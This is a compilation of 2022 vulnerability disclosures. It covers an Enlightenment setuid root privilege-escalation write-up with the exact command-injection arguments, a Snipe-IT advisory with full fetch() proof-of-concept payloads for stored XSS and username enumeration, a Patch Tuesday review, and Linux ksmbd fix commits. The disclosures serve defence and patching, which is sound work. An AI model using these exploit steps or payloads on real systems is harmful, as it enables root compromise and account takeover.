enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

**CVE-2022-37706**

Hello guys, this time I'm gonna talk about a recent 0-day I found in one of the  
main window managers of Linux called Enlightenment (https://www.enlightenment.org/).  
This 0-day gonna take any user to root privileges very easily and instantly.  
The exploit is tested on Ubuntu 22.04, but should work just fine on any distro.  

First of all Enlightenment is a Window Manager, Compositor and Minimal Desktop  
for Linux (the primary platform), BSD and any other compatible UNIX system.  

I installed this window manager to experiment a bit with it. It was interesting  
for me as it contain a lot of tools and it looks pretty neat to be honest.  

After I installed the package using apt install enlightenment I examined the  
installed files and directory on my system, a lot of modules and a lot of helper  
binaries, but what is most interesting is :  

    ➜  enlightenment cd /usr/lib/x86_64-linux-gnu/enlightenment/
    ➜  enlightenment find . -perm -4000                         
    ./utils/enlightenment_ckpasswd
    ./utils/enlightenment_system
    ./utils/enlightenment_sys
    

It installs some SUID binaries, then I was thinking if I can use one of those  
to escalate to root, the binaries were all secure looking and well coded.  
The binary we will be talking about is enlightenment\_sys.  

As any other target we choose a strategy to apply after doing some pre-assessment  
see my blog here if not yet (https://pwn-maher.blogspot.com/2020/10/vulnerability-assessment.html)  

I audited the code on a Top-Down approach.  
And because this window manager is open source, the source code will be available  
for all those binaries and modules.  
So first thing I did was apt source enlightenment to get all the source code,  
and with a bit of digging we can get to the target binary code.  

But to debug the binary I load it to Ghidra for analysis and to have addresses  
to set breakpoints and all.  
No symbols were found first try but yeah no need for those as it turned out to  
be a relatively small binary.  
Surprisingly, I found it very pleasing to look at the decompiled pseudo-code of  
Ghidra than looking directly at the src (avoid macros, avoid also those checks  
against the OS being used to compile a specific block of code).  

So let's start analysis.  

1- Play with the binary.  
Let's run the file to see some information about our target:  
  

Running the binary do not give any output:  
  

Giving --help argument gave this output:  
  
Sorry, I will use it to get root.  

Next let's just strace and see if it will use any suspicious syscalls like  
execve or openat:  
strace ./enlightenment\_sys 2>&1 | grep open  
  
It just opens known libraries at places we don't have permission to tamper with.  

strace ./enlightenment\_sys 2>&1 | grep exec  
  

2- Let's reverse engineer the binary and then exploit it.  

I created a new Ghidra project, and I loaded this specific binary.  
Because symbols were not found, we can spot the main function using entry.  
The first argument to entry function is main itself.  
I renamed it to main for future references.  
Scrolling a bit down I can already spot system() function being used.  

As a pwner I spend days on challenges to spawn this specific function x)  
I reversed the binary looking for a memory corruption bug or some heap problems  
, but actually it was a weird Command Injection.  
The binary take all security precautions before running system, but sadly we  
can always inject our input in there.  
  

Ok, now let's walk the binary from top up to our system function, trying to  
inject our input in there.  

First the binary just checks if the first arg is --help or -h and shows that  
message we saw earlier.  
  

Second it elevate it's privileges to root.  
  

Next it unset almost all environment variables (security precautions) to not  
invoke another non-intended binary.  
  

So if the first arg we entered is "mount" it will enter this branch, check some  
flags given, those flags gonna be set on the stack.  

Next it checks if the next param after mount is UUID= we don't want to enter  
here, so we gave "/dev/../tmp/;/tmp/exploit".  
  
Like this we pass the check at line 410. the strncmp check.  
Because if it don't start with /dev/ the binary will exit.  
Next there is a call to stat64 on that file we provided, note that we can  
create a folder called ";" and that will be causing the command injection.  
Until now, the exploit already created this file /dev/../tmp/;/tmp/exploit,  
but this is not the exploit that will be called.  
  
  

We're getting closer to system() now.  
Now p (pointer), gets updated to the last argument given to our SUID binary,  
/tmp///net.  

Why providing /tmp///net when we can pass /tmp/net?  
We will bypass this check:  
if (((next_next == (char *)0x0) || (next_next[1] == '\0')) || ((long)next_next - (long)p != 6))  
We needed /tmp/net to exist and /tmp/// to be on length 6.  

Now the last stat64 will check for the existence of "/dev/net"  
\_\_snprintf\_chk(cmd,0x1000,1,0x1000,"/dev%s",next\_next);  
And it will find it, so we pass that last check.  

Now it will check for the availability for some files, but that's not important  
at this point, because we're all set and all close to trigger arbitrary Command  
Execution.  

Now eina\_strbuf\_new() will just initialize the command that will be passed to  
system, the problem here is that we entered it as:  

/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net  

But the binary calls eina\_strbuf\_append\_printf() for several times and becomes  
/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), /dev/../tmp/;/tmp/exploit /tmp///net  
Notice that double quotes are removed, and we will be able to call /tmp/exploit  
as root.  
  

The binary tried it's best to mitigate any non-intended behavior but as usual  
anything can be pwned. I wasn't expecting to exploit this using a logical bug  
like this.  
I want the next CVE to be a memory corruption leading to LPE root.  

Twitter disclosure: https://twitter.com/maherazz2/status/1569665311707734023

CVE-2022-37706: GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)

Snipe-IT through 6.0.14 allows attackers to check whether a user account exists because of response variations in a /password/reset request.

POSTED BY: Charalampos Maraziaris / 23.12.2022

**Multiple vulnerabilities in Snipe-IT**

CENSUS ID:

CENSUS-2022-0002

CVE IDs:

CVE-2022-44380, CVE-2022-44381

Affected Products:

Snipe-IT versions prior to 6.0.14

Class of CVE-2022-44380:

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

Class of CVE-2022-44381:

Improper Access Control (CWE-284)

Discovered by:

Charalampos Maraziaris

CENSUS identified Cross-Site Scripting (XSS) and username fingerprinting bugs in Snipe-IT. Snipe-IT is a free open source IT asset/license management system. CENSUS has verified that release 6.0.14 of Snipe-IT carries appropriate fixes only for the identified Cross Site Scripting vulnerabilities.

**CVE-2022-44380 Vulnerability Details**

A stored XSS vulnerability exists in the **"Account"** drop-down menu on the top-right of the app's UI (present in every page), when the user selects the **"View Assigned Assets"** options from the menu. A Stored XSS attack allows for adversaries to place malicious Javascript code into the database and have this Javascript code executed in a visitor's browser.

The loaded view (account/view-assets) renders Assets, Licences, Accessories and Consumables drawn from the database. The code responsible for presenting the database entries in the "account/view-assets" view (/resources/views/account/view-assets.blade.php) is presented below (release 6.0.12):

For Accessories: /resources/views/account/view-assets.blade.php

    
        550: <td>{!! $accessory->name !!}</td>
    

For Consumables: /resources/views/account/view-assets.blade.php

    
        598: <td>{!! $consumable->name !!}</td>
    

As shown above, the title is drawn from the database without using the double curly braces ({{ ... }}) that provide for HTML entity escaping in the Laravel Blade framework. Instead, ({!! ... !!}) is used that does not escape content. Therefore it is possible for an attacker to inject malicious Javascript in the Accessory and Consumable name field, and have this executed on a visitor's browser.

The stored XSS attack can be performed by an adversary that has **Accessory.CREATE** permissions (to insert an Accessory title in the database) and **Accessory.CHECKOUT** permissions (to assign this Accessory to any user). The same attack targeting Consumables can be performed by an adversary possessing **Consumable.CREATE** and **Consumable.CHECKOUT** permissions. Any user can be the victim of this attack as the malicious asset could be _assigned_ to that user. By targeting a Super User, an authenticated adversary can achieve privilege escalation, granting himself the Super User status.

As a proof of concept, the following payload creates a malicious **Accessory** entry:

    
    await fetch("http://SNIPE-IT-DOMAIN/accessories", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "multipart/form-data; boundary=---------------------------423391379527772494482286626525",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        },
        "referrer": "http://SNIPE-IT-DOMAIN/accessories/create",
        "body": "
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"_token\"\r\n\r\VALID_CSRF_TOKEN\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"company_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"name\"\r\n\r\nabc <script> alert(1); </script>\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"category_id\"\r\n\r\nVALID_CATEGORY_ID\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"supplier_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"manufacturer_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"location_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"model_number\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"order_number\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"purchase_date\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"purchase_cost\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"qty\"\r\n\r\n9999\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"min_amt\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"notes\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"image\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"image\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525--\r\n",
        "method": "POST",
        "mode": "cors"
    });
    

To execute the above payload one needs to replace the VALID\_CSRF\_TOKEN and VALID\_CATEGORY\_ID with valid values.

The adversary can then use the following payload to assign the malicious Accessory to a victim user:

    
    await fetch("http://SNIPE-IT-DOMAIN/accessories/ACCESSORY_ID/checkout", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "application/x-www-form-urlencoded",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        },
        "referrer": "http://SNIPE-IT-DOMAIN/accessories/ACCESSORY_ID/checkout",
        "body": "_token=VALID_CSRF_TOKEN&assigned_to=VICTIM_USER_ID&note=",
        "method": "POST",
        "mode": "cors"
    });
    

Please replace VALID\_CSRF\_TOKEN, VICTIM\_USER\_ID and ACCESSORY\_ID with the relevant values. ACCESSORY\_ID would be the identifier of the newly created malicious accessory. VICTIM\_USER\_ID would be another user's ID. For example the app creator is a privileged account and usually has the ID 1.

It is important to note that the payload can perform any action on the platform as the victim user, including elevating the permissions of the attacker (if the victim user is a privileged account).

**CVE-2022-44381 Vulnerability Details**

The password reset mechanism displays a different message based on whether the (attacker-controlled) input username exists in the user database or not. It is therefore possible for an attacker to fingerprint if a specific username exists in the deployed system or not.

The attacker needs to send a malicious POST request targeting /password/reset as shown below:

    
        "body" : "_token=XXX&password=password123&password_confirmation=password123&token=123&username=TARGET_USERNAME"
    

where "\_token" is a CSRF token obtained by a previous request, e.g. a failed post request to

/login

.

The functionality of reset() is as follows:

1.  It validates that the required FORM fields exist and are well formed. It does NOT verify however the validity of the RESET "token" (the random 123 value in our example).
2.  Checks if an activated user with this username exists in the user database.
    *   If so, it tries to reset the old password with the new one. This fails, since the token does not match the server issued token, and results to a redirect to an **error** page (line 119).
    *   If not, the application redirects to a **success** page (line 125).

    
        public function reset(Request $request)
        {
            $broker = $this->broker();
            $request->validate($this->rules(), $request->all(), $this->validationErrorMessages());
    
            // Check to see if the user even exists - we'll treat the response the same to prevent user sniffing
            if ($user = User::where('username', '=', $request->input('username'))->where('activated', '1')->whereNotNull('email')->first()) {
    
                // set the response
                $response = $broker->reset(
                    $this->credentials($request), function ($user, $password) {
                    $this->resetPassword($user, $password);
                });
    
                // Check if the password reset above actually worked
                if ($response == \Password::PASSWORD_RESET) {
                    return redirect()->guest('login')->with('success', trans('passwords.reset'));
                }
    
                \Log::debug('Password reset for '.$user->username.' FAILED - this user exists but the token is not valid');
    119:        return redirect()->back()->withInput($request->only('email'))->with('error', trans('passwords.token'));
            }
    
    
            \Log::debug('Password reset for '.$request->input('username').' FAILED - user does not exist or does not have an email address - but make it look like it succeeded');
    125:    return redirect()->guest('login')->with('success', trans('passwords.reset'));
        }
    

Therefore the attacker can infer whether a username exists in the database, based on the contents of the output page.

**Recommendation**

At the time of writing Snipe-IT has only addressed the XSS issues of CVE-2022-44380 in version 6.0.14. No patch is currently available for the user fingerprinting issue CVE-2022-44381. We will be updating this advisory if / when a patch arrives for CVE-2022-44381. CENSUS strongly recommends upgrading to version 6.0.14 (or greater) of Snipe-IT for the time being.

**Disclosure Timeline**

Vendor Contact:

November 8, 2022

CVE Allocation:

November 30, 2022

Vendor Fix Released:

December 9, 2022

Public Advisory:

December 23, 2022

CVE-2022-44381: CENSUS | IT Security Works

Hello everyone! This episode will be about Microsoft Patch Tuesday for December 2022, including vulnerabilities that were added between November and December Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. Alternative video link (for Russia): https://vk.com/video-149273431_456239112 But let’s start with an older vulnerability. This will be another example why […]

Hello everyone! This episode will be about Microsoft Patch Tuesday for December 2022, including vulnerabilities that were added between November and December Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities.

Alternative video link (for Russia): https://vk.com/video-149273431\_456239112

But let’s start with an older vulnerability. This will be another example why vulnerability prioritization is a tricky thing and you should patch everything. In the September Microsoft Patch Tuesday there was a vulnerability **Information Disclosure** – SPNEGO Extended Negotiation (NEGOEX) Security Mechanism (CVE-2022-37958), which was completely unnoticed by everyone. Not a single VM vendor paid attention to it in their reviews. I didn’t pay attention either.

**SPNEGO** **(Simple and Protected GSSAPI Negotiation Mechanism)** is a GSSAPI “pseudo mechanism” used by client-server software to negotiate the choice of security technology. SPNEGO is used when a client application wants to authenticate to a remote server, but neither end is sure what authentication protocols the other supports. Who knows what kind of disclosure there might be. This vulnerability had CVSS 7.5 (High), not even Critical.

And then on December 13th, IBM Security X-Force researcher Valentina Palmiotti posts a video exploiting this vulnerability, which turns out to be Remote Code Execution. In this video, a Python script is executed in a Linux virtual machine, and in a Windows 10 virtual machine, the message _“Your PC will automatically restart in one minute”_ appears, which indicates that some code was executed there. The researcher is famous and it is highly unlikely that the video is fake.

It turned out that the vulnerability can be exploited during the authentication attempts. The vulnerability affects various protocols. Primarily RDP and SMB. It may be relevant for SMTP, HTTP and others with a non-standard configuration. So, this vulnerability could potentially be worse than EternalBlue.

Microsoft has made changes to the description of the vulnerability. Now it is Critical RCE. NVD hasn’t made any changes yet. IBM promises not to release details until the second quarter of 2023 to give people time to patch.

Now let’s look at the most interesting vulnerabilities of Microsoft Patch Tuesday for December 2022.

    $ cat comments_links.txt 
    Qualys|December 2022 Patch Tuesday|https://blog.qualys.com/vulnerabilities-threat-research/patch-tuesday/2022/12/13/the-december-2022-patch-tuesday-security-update-review
    ZDI|THE DECEMBER 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/12/13/the-december-2022-security-update-review
    
    $ python3.8 process_classify_ms_products.py  # Automated classifier for Microsoft products
    
    $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "December" --mspt-comments-links-path "comments_links.txt"  --rewrite-flag "True"
    ...
    Creating Patch Tuesday profile...
    MS PT Year: 2022
    MS PT Month: December
    MS PT Date: 2022-12-13
    MS PT CVEs found: 49
    Ext MS PT Date from: 2022-11-09
    Ext MS PT Date to: 2022-12-12
    Ext MS PT CVEs found: 32
    ALL MS PT CVEs: 81
    ...

*   All vulnerabilities: 80
*   Urgent: 0
*   Critical: 3
*   High: 29
*   Medium: 48
*   Low: 0

There were 2 vulnerabilities with signs of exploitation in the wild:

1.  **Security Feature Bypass** – Windows SmartScreen (CVE-2022-44698). It is a bypass of the Windows SmartScreen security feature, and has been seen exploited in the wild. It allows attackers to craft documents that won’t get tagged with Microsoft’s “Mark of the Web” despite being downloaded from untrusted sites. Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB, Microsoft websites. The existence of a public exploit is mentioned in Microsoft CVSS Temporal Score (Functional Exploit). To be honest, I do not consider these warnings from the operating system to be effective. Therefore, this vulnerability does not seem very critical to me. I think an Antivirus or EDR solution should block suspicious files from running in the first place.
2.  **Memory Corruption** – Microsoft Edge (CVE-2022-4135, CVE-2022-4262). Exploitation in the wild is mentioned on Vulners (cisa\_kev object), AttackerKB websites. CVE-2022-4135: Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High). CVE-2022-4262: Type confusion in V8 in Google Chrome prior to 108.0.5359.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Among other vulnerabilities without public exploits and signs of exploitation in the wild, it makes sense to pay attention to the following:

1.  **Remote Code Execution** – Microsoft PowerShell (CVE-2022-41076). This critical vulnerability affects PowerShell where any authenticate user, regardless of its privilege could escape the PowerShell Remoting Session Configuration and run unapproved commands on the target system. It is worth mentioning that, typically after the initial breach, attackers use the tools available on the system to keep the preserve or advance around a network, and PowerShell is one of the more capable tools they can find. 
2.  **Remote Code Execution** – Windows Secure Socket Tunneling Protocol (SSTP) (CVE-2022-44670, CVE-2022-44676). This critical vulnerability affects Windows Secure Socket Tunneling Protocol (SSTP), and according to Microsoft, an attacker would need to win a race condition to successfully exploit these bugs. An unauthenticated attacker could send a specially crafted connection request to a RAS server, which could lead to remote code execution (RCE) on the RAS server machine. If you do not have this service, disable it. 
3.  Among the **Elevation of Privilege** vulnerabilities, I would like to highlight a vulnerability in DirectX Graphics Kernel (CVE-2022-44710) and Windows Print Spooler (CVE-2022-44678, CVE-2022-44681).

Full Vulristics report: ms\_patch\_tuesday\_december2022

Hi! My name is Alexander and I am a Vulnerability Management specialist. You can read more about me here. Currently, the best way to follow me is my Telegram channel @avleonovcom. I update it more often than this site. If you haven’t used Telegram yet, give it a try. It’s great. You can discuss my posts or ask questions at @avleonovchat.

А всех русскоязычных я приглашаю в ещё один телеграмм канал @avleonovrus, первым делом теперь пишу туда.

Microsoft Patch Tuesday December 2022: SPNEGO RCE, Mark of the Web Bypass, Edge Memory Corruptions

An issue was discovered in the Linux kernel 5.10.x before 5.10.155. A use-after-free in io_sqpoll_wait_sq in fs/io_uring.c allows an attacker to crash the kernel, resulting in denial of service. finish_wait can be skipped. An attack can occur in some situations by forking a process and then quickly terminating it. NOTE: later kernel versions, such as the 5.15 longterm series, substantially changed the implementation of io_sqpoll_wait_sq.

CVE-2022-47946

An issue was discovered in ksmbd in the Linux kernel before 5.19.2. There is an out-of-bounds read and OOPS for SMB2_WRITE, when there is a large length in the zero DataOffset case.

Permalink

Browse files

ksmbd: prevent out of bound read for SMB2\_WRITE

OOB read memory can be written to a file,
if DataOffset is 0 and Length is too large
in SMB2\_WRITE request of compound request.

To prevent this, when checking the length of
the data area of SMB2\_WRITE in smb2\_get\_data\_area\_len(),
let the minimum of DataOffset be the size of
SMB2 header + the size of SMB2\_WRITE header.

This bug can lead an oops looking something like:

\[  798.008715\] BUG: KASAN: slab-out-of-bounds in copy\_page\_from\_iter\_atomic+0xd3d/0x14b0
\[  798.008724\] Read of size 252 at addr ffff88800f863e90 by task kworker/0:2/2859
...
\[  798.008754\] Call Trace:
\[  798.008756\]  <TASK>
\[  798.008759\]  dump\_stack\_lvl+0x49/0x5f
\[  798.008764\]  print\_report.cold+0x5e/0x5cf
\[  798.008768\]  ? \_\_filemap\_get\_folio+0x285/0x6d0
\[  798.008774\]  ? copy\_page\_from\_iter\_atomic+0xd3d/0x14b0
\[  798.008777\]  kasan\_report+0xaa/0x120
\[  798.008781\]  ? copy\_page\_from\_iter\_atomic+0xd3d/0x14b0
\[  798.008784\]  kasan\_check\_range+0x100/0x1e0
\[  798.008788\]  memcpy+0x24/0x60
\[  798.008792\]  copy\_page\_from\_iter\_atomic+0xd3d/0x14b0
\[  798.008795\]  ? pagecache\_get\_page+0x53/0x160
\[  798.008799\]  ? iov\_iter\_get\_pages\_alloc+0x1590/0x1590
\[  798.008803\]  ? ext4\_write\_begin+0xfc0/0xfc0
\[  798.008807\]  ? current\_time+0x72/0x210
\[  798.008811\]  generic\_perform\_write+0x2c8/0x530
\[  798.008816\]  ? filemap\_fdatawrite\_wbc+0x180/0x180
\[  798.008820\]  ? down\_write+0xb4/0x120
\[  798.008824\]  ? down\_write\_killable+0x130/0x130
\[  798.008829\]  ext4\_buffered\_write\_iter+0x137/0x2c0
\[  798.008833\]  ext4\_file\_write\_iter+0x40b/0x1490
\[  798.008837\]  ? \_\_fsnotify\_parent+0x275/0xb20
\[  798.008842\]  ? \_\_fsnotify\_update\_child\_dentry\_flags+0x2c0/0x2c0
\[  798.008846\]  ? ext4\_buffered\_write\_iter+0x2c0/0x2c0
\[  798.008851\]  \_\_kernel\_write+0x3a1/0xa70
\[  798.008855\]  ? \_\_x64\_sys\_preadv2+0x160/0x160
\[  798.008860\]  ? security\_file\_permission+0x4a/0xa0
\[  798.008865\]  kernel\_write+0xbb/0x360
\[  798.008869\]  ksmbd\_vfs\_write+0x27e/0xb90 \[ksmbd\]
\[  798.008881\]  ? ksmbd\_vfs\_read+0x830/0x830 \[ksmbd\]
\[  798.008892\]  ? \_raw\_read\_unlock+0x2a/0x50
\[  798.008896\]  smb2\_write+0xb45/0x14e0 \[ksmbd\]
\[  798.008909\]  ? \_\_kasan\_check\_write+0x14/0x20
\[  798.008912\]  ? \_raw\_spin\_lock\_bh+0xd0/0xe0
\[  798.008916\]  ? smb2\_read+0x15e0/0x15e0 \[ksmbd\]
\[  798.008927\]  ? memcpy+0x4e/0x60
\[  798.008931\]  ? \_raw\_spin\_unlock+0x19/0x30
\[  798.008934\]  ? ksmbd\_smb2\_check\_message+0x16af/0x2350 \[ksmbd\]
\[  798.008946\]  ? \_raw\_spin\_lock\_bh+0xe0/0xe0
\[  798.008950\]  handle\_ksmbd\_work+0x30e/0x1020 \[ksmbd\]
\[  798.008962\]  process\_one\_work+0x778/0x11c0
\[  798.008966\]  ? \_raw\_spin\_lock\_irq+0x8e/0xe0
\[  798.008970\]  worker\_thread+0x544/0x1180
\[  798.008973\]  ? \_\_cpuidle\_text\_end+0x4/0x4
\[  798.008977\]  kthread+0x282/0x320
\[  798.008982\]  ? process\_one\_work+0x11c0/0x11c0
\[  798.008985\]  ? kthread\_complete\_and\_exit+0x30/0x30
\[  798.008989\]  ret\_from\_fork+0x1f/0x30
\[  798.008995\]  </TASK>

Fixes: e2f3448 ("cifsd: add server-side procedures for SMB3")
Cc: stable@vger.kernel.org
Reported-by: zdi-disclosures@trendmicro.com # ZDI-CAN-17817
Signed-off-by: Hyunchul Lee <hyc.lee@gmail.com>
Acked-by: Namjae Jeon <linkinjeon@kernel.org>
Signed-off-by: Steve French <stfrench@microsoft.com>

*   Loading branch information

CVE-2022-47943: ksmbd: prevent out of bound read for SMB2_WRITE · torvalds/linux@ac60778

An issue was discovered in ksmbd in the Linux kernel before 5.18.18. fs/ksmbd/smb2pdu.c lacks length validation in the non-padding case in smb2_write.

Permalink

Browse files

ksmbd: validate length in smb2\_write()

The SMB2 Write packet contains data that is to be written
to a file or to a pipe. Depending on the client, there may
be padding between the header and the data field.
Currently, the length is validated only in the case padding
is present.

Since the DataOffset field always points to the beginning
of the data, there is no need to have a special case for
padding. By removing this, the length is validated in both
cases.

Signed-off-by: Marios Makassikis <mmakassikis@freebox.fr>
Acked-by: Namjae Jeon <linkinjeon@kernel.org>
Signed-off-by: Steve French <stfrench@microsoft.com>

*   Loading branch information

CVE-2022-47940: ksmbd: validate length in smb2_write() · torvalds/linux@158a66b

An issue was discovered in ksmbd in the Linux kernel before 5.19.2. There is a heap-based buffer overflow in set_ntacl_dacl, related to use of SMB2_QUERY_INFO_HE after a malformed SMB2_SET_INFO_HE command.

Permalink

Browse files

ksmbd: fix heap-based overflow in set\_ntacl\_dacl()

The testcase use SMB2\_SET\_INFO\_HE command to set a malformed file attribute
under the label \`security.NTACL\`. SMB2\_QUERY\_INFO\_HE command in testcase
trigger the following overflow.

\[ 4712.003781\] ==================================================================
\[ 4712.003790\] BUG: KASAN: slab-out-of-bounds in build\_sec\_desc+0x842/0x1dd0 \[ksmbd\]
\[ 4712.003807\] Write of size 1060 at addr ffff88801e34c068 by task kworker/0:0/4190

\[ 4712.003813\] CPU: 0 PID: 4190 Comm: kworker/0:0 Not tainted 5.19.0-rc5 #1
\[ 4712.003850\] Workqueue: ksmbd-io handle\_ksmbd\_work \[ksmbd\]
\[ 4712.003867\] Call Trace:
\[ 4712.003870\]  <TASK>
\[ 4712.003873\]  dump\_stack\_lvl+0x49/0x5f
\[ 4712.003935\]  print\_report.cold+0x5e/0x5cf
\[ 4712.003972\]  ? ksmbd\_vfs\_get\_sd\_xattr+0x16d/0x500 \[ksmbd\]
\[ 4712.003984\]  ? cmp\_map\_id+0x200/0x200
\[ 4712.003988\]  ? build\_sec\_desc+0x842/0x1dd0 \[ksmbd\]
\[ 4712.004000\]  kasan\_report+0xaa/0x120
\[ 4712.004045\]  ? build\_sec\_desc+0x842/0x1dd0 \[ksmbd\]
\[ 4712.004056\]  kasan\_check\_range+0x100/0x1e0
\[ 4712.004060\]  memcpy+0x3c/0x60
\[ 4712.004064\]  build\_sec\_desc+0x842/0x1dd0 \[ksmbd\]
\[ 4712.004076\]  ? parse\_sec\_desc+0x580/0x580 \[ksmbd\]
\[ 4712.004088\]  ? ksmbd\_acls\_fattr+0x281/0x410 \[ksmbd\]
\[ 4712.004099\]  smb2\_query\_info+0xa8f/0x6110 \[ksmbd\]
\[ 4712.004111\]  ? psi\_group\_change+0x856/0xd70
\[ 4712.004148\]  ? update\_load\_avg+0x1c3/0x1af0
\[ 4712.004152\]  ? asym\_cpu\_capacity\_scan+0x5d0/0x5d0
\[ 4712.004157\]  ? xas\_load+0x23/0x300
\[ 4712.004162\]  ? smb2\_query\_dir+0x1530/0x1530 \[ksmbd\]
\[ 4712.004173\]  ? \_raw\_spin\_lock\_bh+0xe0/0xe0
\[ 4712.004179\]  handle\_ksmbd\_work+0x30e/0x1020 \[ksmbd\]
\[ 4712.004192\]  process\_one\_work+0x778/0x11c0
\[ 4712.004227\]  ? \_raw\_spin\_lock\_irq+0x8e/0xe0
\[ 4712.004231\]  worker\_thread+0x544/0x1180
\[ 4712.004234\]  ? \_\_cpuidle\_text\_end+0x4/0x4
\[ 4712.004239\]  kthread+0x282/0x320
\[ 4712.004243\]  ? process\_one\_work+0x11c0/0x11c0
\[ 4712.004246\]  ? kthread\_complete\_and\_exit+0x30/0x30
\[ 4712.004282\]  ret\_from\_fork+0x1f/0x30

This patch add the buffer validation for security descriptor that is
stored by malformed SMB2\_SET\_INFO\_HE command. and allocate large
response buffer about SMB2\_O\_INFO\_SECURITY file info class.

Fixes: e2f3448 ("cifsd: add server-side procedures for SMB3")
Cc: stable@vger.kernel.org
Reported-by: zdi-disclosures@trendmicro.com # ZDI-CAN-17771
Reviewed-by: Hyunchul Lee <hyc.lee@gmail.com>
Signed-off-by: Namjae Jeon <linkinjeon@kernel.org>
Signed-off-by: Steve French <stfrench@microsoft.com>

*   Loading branch information

CVE-2022-47942: ksmbd: fix heap-based overflow in set_ntacl_dacl() · torvalds/linux@8f05411

An issue was discovered in ksmbd in the Linux kernel before 5.19.2. fs/ksmbd/smb2pdu.c omits a kfree call in certain smb2_handle_negotiate error conditions, aka a memory leak.

Browse files

ksmbd: fix memory leak in smb2\_handle\_negotiate

The allocated memory didn't free under an error
path in smb2\_handle\_negotiate().

Fixes: e2f3448 ("cifsd: add server-side procedures for SMB3")
Cc: stable@vger.kernel.org
Reported-by: zdi-disclosures@trendmicro.com # ZDI-CAN-17815
Signed-off-by: Namjae Jeon <linkinjeon@kernel.org>
Reviewed-by: Hyunchul Lee <hyc.lee@gmail.com>
Signed-off-by: Steve French <stfrench@microsoft.com>

*   Loading branch information

namjaejeon authored and Steve French committed

Aug 1, 2022

1 parent af7c39d commit aa7253c2393f6dcd6a1468b0792f6da76edad917

CVE-2022-47941: ksmbd: fix memory leak in smb2_handle_negotiate · torvalds/linux@aa7253c

An issue was discovered in ksmbd in the Linux kernel before 5.19.2. fs/ksmbd/smb2pdu.c has a use-after-free and OOPS for SMB2_TREE_DISCONNECT.

Permalink

Browse files

ksmbd: fix use-after-free bug in smb2\_tree\_disconect

smb2\_tree\_disconnect() freed the struct ksmbd\_tree\_connect,
but it left the dangling pointer. It can be accessed
again under compound requests.

This bug can lead an oops looking something link:

\[ 1685.468014 \] BUG: KASAN: use-after-free in ksmbd\_tree\_conn\_disconnect+0x131/0x160 \[ksmbd\]
\[ 1685.468068 \] Read of size 4 at addr ffff888102172180 by task kworker/1:2/4807
...
\[ 1685.468130 \] Call Trace:
\[ 1685.468132 \]  <TASK>
